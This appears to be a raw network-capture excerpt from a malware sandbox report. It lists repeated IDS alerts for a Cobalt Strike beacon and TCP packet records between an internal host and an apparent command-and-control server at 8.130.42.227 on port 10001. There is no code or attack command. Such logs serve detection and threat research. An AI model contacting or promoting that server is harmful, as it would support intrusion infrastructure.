                                                                2024-10-01T09:19:33.550740+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498688.130.42.22710001TCP
                                                                2024-10-01T09:19:34.630154+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498698.130.42.22710001TCP
                                                                2024-10-01T09:19:35.695994+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498708.130.42.22710001TCP
                                                                2024-10-01T09:19:36.920659+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498718.130.42.22710001TCP
                                                                2024-10-01T09:19:38.425762+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498728.130.42.22710001TCP
                                                                2024-10-01T09:19:39.518197+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498738.130.42.22710001TCP
                                                                2024-10-01T09:19:40.591060+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498748.130.42.22710001TCP
                                                                2024-10-01T09:19:42.136365+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498758.130.42.22710001TCP
                                                                2024-10-01T09:19:43.230968+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498768.130.42.22710001TCP
                                                                2024-10-01T09:19:44.304788+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498778.130.42.22710001TCP
                                                                2024-10-01T09:19:45.387293+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498788.130.42.22710001TCP
                                                                2024-10-01T09:19:46.467149+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498798.130.42.22710001TCP
                                                                2024-10-01T09:19:47.532118+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498808.130.42.22710001TCP
                                                                2024-10-01T09:19:48.616951+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498818.130.42.22710001TCP
                                                                2024-10-01T09:19:49.687932+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498828.130.42.22710001TCP
                                                                2024-10-01T09:19:50.784094+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498838.130.42.22710001TCP
                                                                2024-10-01T09:19:51.912928+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498848.130.42.22710001TCP
                                                                2024-10-01T09:19:52.973922+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498858.130.42.22710001TCP
                                                                2024-10-01T09:19:54.271035+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498868.130.42.22710001TCP
                                                                2024-10-01T09:19:58.400646+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498878.130.42.22710001TCP
                                                                2024-10-01T09:19:59.471246+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498888.130.42.22710001TCP
                                                                2024-10-01T09:20:00.548335+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498898.130.42.22710001TCP
                                                                2024-10-01T09:20:01.623607+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498908.130.42.22710001TCP
                                                                2024-10-01T09:20:02.745260+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498918.130.42.22710001TCP
                                                                2024-10-01T09:20:03.807192+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498928.130.42.22710001TCP
                                                                2024-10-01T09:20:04.885627+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498938.130.42.22710001TCP
                                                                2024-10-01T09:20:05.944846+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498948.130.42.22710001TCP
                                                                2024-10-01T09:20:07.026432+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498958.130.42.22710001TCP
                                                                2024-10-01T09:20:08.116543+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498968.130.42.22710001TCP
                                                                2024-10-01T09:20:09.189258+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498978.130.42.22710001TCP
                                                                2024-10-01T09:20:10.271995+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498988.130.42.22710001TCP
                                                                2024-10-01T09:20:11.341983+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498998.130.42.22710001TCP
                                                                2024-10-01T09:20:13.189833+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499008.130.42.22710001TCP
                                                                2024-10-01T09:20:14.262971+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499018.130.42.22710001TCP
                                                                2024-10-01T09:20:15.316609+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499028.130.42.22710001TCP
                                                                2024-10-01T09:20:16.386558+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499038.130.42.22710001TCP
                                                                2024-10-01T09:20:17.480378+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499048.130.42.22710001TCP
                                                                2024-10-01T09:20:18.554731+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499058.130.42.22710001TCP
                                                                2024-10-01T09:20:19.621581+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499068.130.42.22710001TCP
                                                                2024-10-01T09:20:21.232159+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499078.130.42.22710001TCP
                                                                2024-10-01T09:20:22.303033+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499088.130.42.22710001TCP
                                                                2024-10-01T09:20:23.376704+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499098.130.42.22710001TCP
                                                                2024-10-01T09:20:24.495821+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499108.130.42.22710001TCP
                                                                2024-10-01T09:20:25.565805+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499118.130.42.22710001TCP
                                                                2024-10-01T09:20:26.660847+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499128.130.42.22710001TCP
                                                                2024-10-01T09:20:27.739974+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499138.130.42.22710001TCP
                                                                2024-10-01T09:20:28.809816+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499148.130.42.22710001TCP
                                                                2024-10-01T09:20:29.972968+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499158.130.42.22710001TCP
                                                                2024-10-01T09:20:31.062763+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499168.130.42.22710001TCP
                                                                2024-10-01T09:20:32.150805+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499178.130.42.22710001TCP
                                                                2024-10-01T09:20:36.248804+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499188.130.42.22710001TCP
                                                                2024-10-01T09:20:37.336700+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499198.130.42.22710001TCP
                                                                2024-10-01T09:20:38.408916+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499208.130.42.22710001TCP
                                                                2024-10-01T09:20:40.072859+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499218.130.42.22710001TCP
                                                                2024-10-01T09:20:41.148707+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499228.130.42.22710001TCP
                                                                2024-10-01T09:20:42.228856+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499238.130.42.22710001TCP
                                                                2024-10-01T09:20:43.308659+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499248.130.42.22710001TCP
                                                                2024-10-01T09:20:44.388802+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499258.130.42.22710001TCP
                                                                2024-10-01T09:20:45.452971+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499268.130.42.22710001TCP
                                                                2024-10-01T09:20:46.532833+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499278.130.42.22710001TCP
                                                                2024-10-01T09:20:47.631726+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499288.130.42.22710001TCP
                                                                2024-10-01T09:20:48.726981+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499298.130.42.22710001TCP
                                                                2024-10-01T09:20:49.782566+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499308.130.42.22710001TCP
                                                                2024-10-01T09:20:50.869027+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499318.130.42.22710001TCP
                                                                2024-10-01T09:20:52.939150+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499328.130.42.22710001TCP
                                                                2024-10-01T09:20:54.010943+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499338.130.42.22710001TCP
                                                                2024-10-01T09:20:55.078196+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499348.130.42.22710001TCP
                                                                2024-10-01T09:20:56.320815+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499358.130.42.22710001TCP
                                                                2024-10-01T09:20:57.479719+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499368.130.42.22710001TCP
                                                                2024-10-01T09:20:58.539468+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499378.130.42.22710001TCP
                                                                2024-10-01T09:20:59.608844+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499388.130.42.22710001TCP
                                                                2024-10-01T09:21:00.694909+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499398.130.42.22710001TCP
                                                                2024-10-01T09:21:01.773785+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499408.130.42.22710001TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                Oct 1, 2024 09:16:59.294512987 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294544935 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294545889 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294557095 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294569016 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294590950 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294616938 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294616938 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.295258045 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.295269012 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.295308113 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.295337915 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.377784014 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.377832890 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.377842903 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.377891064 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.377906084 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535190105 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535270929 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535279989 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535281897 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535295010 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535305977 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535315037 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535320997 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535320997 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535326004 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535336018 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535347939 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535414934 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535593987 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535629034 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535639048 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535655022 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535680056 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535857916 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535868883 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535880089 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535911083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535959005 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535959005 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535969973 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536016941 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536067009 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536077976 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536087990 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536118031 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536143064 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536218882 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536230087 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536238909 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536251068 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536272049 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536297083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536470890 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536482096 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536493063 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536503077 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536514997 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536520958 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536520958 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536557913 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536809921 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536820889 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536830902 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536860943 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536870003 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536875963 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536880016 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536890984 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536900997 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536910057 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536923885 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536930084 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536950111 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536973953 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537024021 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537034988 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537045956 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537056923 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537066936 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537092924 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537118912 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537638903 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537668943 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537679911 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537698030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537698030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537731886 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537806988 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537817955 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537827969 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537838936 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537858963 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537884951 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537961960 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537974119 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537985086 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537996054 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538000107 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538007975 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538018942 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538028002 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538031101 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538043022 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538049936 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538069963 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538088083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538491964 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538511038 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538541079 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538561106 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622050047 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622059107 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622066975 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622071981 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622077942 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622124910 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622131109 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622251987 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622286081 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622292042 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622304916 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622318029 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622323990 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622329950 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622340918 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622364998 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622394085 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622436047 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622447014 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622457027 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622462034 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622467995 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622478008 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622486115 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622487068 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622497082 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622529030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622529030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622564077 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622622013 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622771978 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622813940 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622817993 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622823954 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622852087 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622867107 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622878075 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622889042 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622900963 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622922897 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622948885 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622948885 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622996092 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623007059 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623016119 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623025894 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623037100 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623043060 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623049021 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623068094 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623092890 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623125076 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623136997 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623145103 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623162985 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623197079 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623547077 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623557091 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623563051 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623603106 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623603106 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623614073 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623624086 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623641014 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623668909 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789215088 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789232969 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789244890 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789262056 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789274931 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789285898 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789298058 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789304018 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789310932 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789321899 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789328098 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789324045 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789338112 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789350033 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789362907 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789371014 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789376020 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789386988 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789400101 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789412022 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789422989 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789427042 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789427042 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789427996 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789433956 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789444923 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789454937 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789458990 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789468050 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789479017 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789489985 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789499044 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.375663996 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.329121113 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.329221010 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.329310894 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.329476118 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.443898916 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.444125891 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.448723078 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.449012995 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.449141026 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.449290991 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.454437017 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.415271044 CEST10001497598.130.42.227192.168.2.4
